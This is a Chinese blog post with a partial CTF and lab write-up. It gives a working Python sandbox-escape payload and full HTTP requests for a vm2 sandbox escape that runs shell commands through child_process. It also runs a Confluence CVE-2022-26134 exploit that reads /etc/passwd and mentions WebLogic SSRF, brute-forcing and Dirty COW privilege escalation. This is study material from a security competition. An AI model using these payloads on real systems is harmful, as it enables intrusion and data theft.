上海磐石ctf部分wp

最新推荐文章于 2024-05-11 10:06:16 发布
最新推荐文章于 2024-05-11 10:06:16 发布
阅读量284 收藏
点赞数
分类专栏: CTF学习 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44807430/article/details/130919330
版权

一、ctf赛题制

1、bird

这道题直接按照图上的翻译即可得到flag

https://www.bilibili.com/read/mobile?id=19369626
image.png

2、ezpython

沙箱逃逸,构造pyload
在这里插入图片描述

找到os对象
print(“”.class.base.subclasses()[137].init.globals[‘po’+‘pen’](‘cat *’).read())

3、nodejs

发现历史漏洞
image.png

抓包读取到:

const express = require('express');
const app = express();
var bodyParser = require('body-parser')
app.use(bodyParser.json())
const {VM} = require("vm2");
const fs = require("fs");
const session = require("express-session");
const cookieParser = require('cookie-parser');
session_secret = Math.random().toString(36).substr(2);
app.use(cookieParser(session_secret));
app.use(session({ secret: session_secret, resave: true, saveUninitialized: true }))

function copyArray(arr1){
    var arr2 = new Array(arr1.length);
    for (var i=0;i<arr1.length;i++){
        if(arr1[i] instanceof Object){
            arr2[i] = copyArray(arr1[i])
        }else{
            arr2[i] = arr1[i]
        }
    }
    return arr2
}

app.get('/', function (req, res) {
    res.send('see `/src`');
});



app.post('/vm2_tester',function(req,res){
    if(req.body.name) {
        req.session.user = {"username": req.body.name}
        const properties = req.body.properties
        for (let i = 0; i < properties.length; i++) {
            if (properties[i] == 'vm2_tester') {
                res.send('cant set vm2_tester by self')
                return
            }
        }
        req.session.user.properties = copyArray(properties)
        res.send('Success')
    }else {
        res.send("input username")
    }
})


app.post('/vm2',function  (req, res) {

    if(req.session.user && req.session.user.properties) {
        for (var i = 0; i < req.session.user.properties.length; i++)
            if (req.session.user.properties[i] == 'vm2_tester') {
                if (req.body["code"]) {
                    if (/\b(?:function)\b/.test(req.body["code"])) {
                        res.send("define function not allowed")
                        return;
                    }
                    if (/\b(?:getPrototypeOf)\b/.test(req.body["code"])) {
                        res.send("define getPrototypeOf not allowed")
                        return;
                    }
                    const vm = new VM();
                    res.send(vm.run(req.body["code"]))
                    return
                } else{
                    res.send("input code")
                }
            }
    }else{
        res.send("not vm2 tester rights")
    }

})


app.get('/', function (req, res) {
    res.send('see `/src`,use vm2 3.9.16');
});
app.get('/src', function (req, res) {
    var data = fs.readFileSync('app.js');
    res.send(data.toString());
});

app.listen(3000, function () {
    console.log('start listening on port 3000');
});

分析:
image.png

他的递归始终是返回arr2,所以多层数组最终里面的值都是传进arr2
image.png

这里过滤的是一维数组,多维数组的值还是可以控制,递归完,多维数组的值还是返回给了arr2
然后弱类型比较的时候,自动比较首个元素
0bf8db6f02b3714ef12563be15dbd85.png

构造对象:
image.png

网上的poc
https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
image.png
该poc为命令注入执行代码,需要去除掉多余的换行、空格,同时转义双引号

创建对象:
POST /vm2_tester HTTP/1.1
Host: 116.236.144.37:29292
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: connect.sid=s%3AYNrtHz85yRxOIPkNumtvpi1w6PdQQXMV.TL3MtFYaewXcWwz3wDzugTXOl6lXQ%2B2RGQRVK5Cpym4
Connection: close
Content-Type: application/json
Content-Length: 82

{“name”:“a”,“properties”:{
“length”:1,
“0”:{“length”:1,“0”:[“vm2_tester”]}}
}
image.png

命令注入:
POST /vm2 HTTP/1.1
Host: 116.236.144.37:29292
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: connect.sid=s%3AYNrtHz85yRxOIPkNumtvpi1w6PdQQXMV.TL3MtFYaewXcWwz3wDzugTXOl6lXQ%2B2RGQRVK5Cpym4
Connection: close
Content-Type: application/json
Content-Length: 335

{“code”:“const err = new Error(); err.name = { toString: new Proxy(() => “”, {apply(target, thiz, args) { const process = args.constructor.constructor(“return process”)(); throw process.mainModule.require(“child_process”).execSync(“cat /f*”).toString();},}), };try { err.stack; } catch (stdout) {stdout; }”}

image.png
flag{uFyIjZmsP8K5NBQhcJ1iwnxWLD3k0fag}

二、漏洞挖掘赛

http://10.103.64.207/

image.png
3389 rdp 被加密无法爆破
1433 mssql 可以kail爆破mssql
445端口:Microsoft-DS,为共享开放,震荡波病毒利用,一般应关闭

139端口:NETBIOS协议应用,为共享开放
135端口:DCOM服务,冲击波病毒利用,不能关闭

10.103.241.206

image.png
ssh ssh爆破
openssh 7.4版本 () OpenSSH命令注入漏洞(CVE-2020-15778)复现

110端口:POP3服务器开放此端口,用于接收邮件
25端口:SMTP服务器所开放的端口,用于发送邮件
111端口:SUN公司的RPC服务所有端口

10.103.53.171

image.png

7001端口 Weblogic的默认端口
验证t3服务
image.png
image.png

CVE-2016-0638
CVE-2018-2893
CVE-2019-2890

s

Weblogic SSRF 漏洞(CVE-2014-4210)

https://blog.csdn.net/zhangxiansheng12/article/details/130738225
image.png
image.png

显然使用上面的payload已经成功探测出了内网的服务,因为成功返回了404,从某些方面讲,这也是一种成功。如果这是一个没有开启的服务,返回的内容会是下图的内容。
image.png

cve-2022-26134
image.png
python3 cve-2022-26134.py http://10.103.4.54:8090/ “cat /etc/passwd”
image.png

脏牛提权:
image.png
写入内存马
没做完

image.png

路向阳_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
CTF练习题WP1
m0_73891130的博客
03-25 597
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7193
BUUCTF题目Misc部分wp(持续更新)
2024年最新CTF_WP-攻防世界web题解,从零开始学数据结构和算法
最新发布
2401_84264536的博客
05-11 436
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1191
【人,终究会被年少不可得之物困其一生】
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5007
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
【第六届强网杯CTF-Wp
qq_45603443的博客
08-02 2439
第六届强网杯全国网络安全挑战赛wp
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
ZZU-CTF部分题目
03-24
赛题中的pwn和re题目,比较基础,可以拿来练手
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 6788
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3528
2022年暑期CTF刷题之路
2023年第七届蓝帽杯半决赛WPCTF&取证)
weixin_63576152的博客
09-18 1412
打开xlsx文件,打开以后,发现没有字,ctrl+a全选,修改你字体颜色,发现有些加粗,有些没加粗,结合题目,应当排序,将每一列从小到大排序,将加粗的单元格改成黑色,将列宽改为2,得到二维码,扫描后得到flag。对SMS.txt的加密逻辑是先AES加密,再base64加密,AES的秘钥在Getkey函数中。base64解码calllog.txt,得到通话记录,搜索10086结果是2条,且都为呼进。Base64、BASE64都是错的,答案格式模糊,而且base64是编码,不是很懂。
CTF】Web反序列wp
毅哥的博客
12-30 259
一道关于反序列法的web题 <?php error_reporting(0); $name=$_GET['name']; $age=$_GET['age']; $pop=$_GET['pop']; if(isset($name) && isset($age)){ $word = unserialize($pop); if($word->cname($name,$age)){ $word->cflag(); }e
ctf(vip限免)WP
qq_62517352的博客
04-09 3308
源码泄露 看题就是要我们看源码,在浏览器里 Ctrl + U 直接查看网页源码,这里也是可以直接看到flag 前台JS绕过 这个题就是不能用F12进行查看源码了,我们的 Ctrl + U 还是可以用的,直接可以得到flag 协议头信息泄露 题目提示要我们抓包,那就抓,抓完这样,什么也没看到 上网搜搜原来是要查看响应头,才能得到flag,记录一下查看步骤,一免以后忘记 先点图示位置 这里点击 Repeater 再点 Go ,就可以在右边看到flag robots后台泄露 robots之前做过,就是在
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP
Jay17的博客
03-02 1438
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP
2023年第十六届全国大学生信息安全竞赛能力赛部分WP
xccwxy的博客
05-29 2285
2023年第十六届全国大学生信息安全竞赛能力赛部分WP
第二届SWCTF部分WP
Welcome To Myon'Blog !
04-25 983
SWCTF、web、密码学、misc杂项、pyc反编译...
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail ...由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目的WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值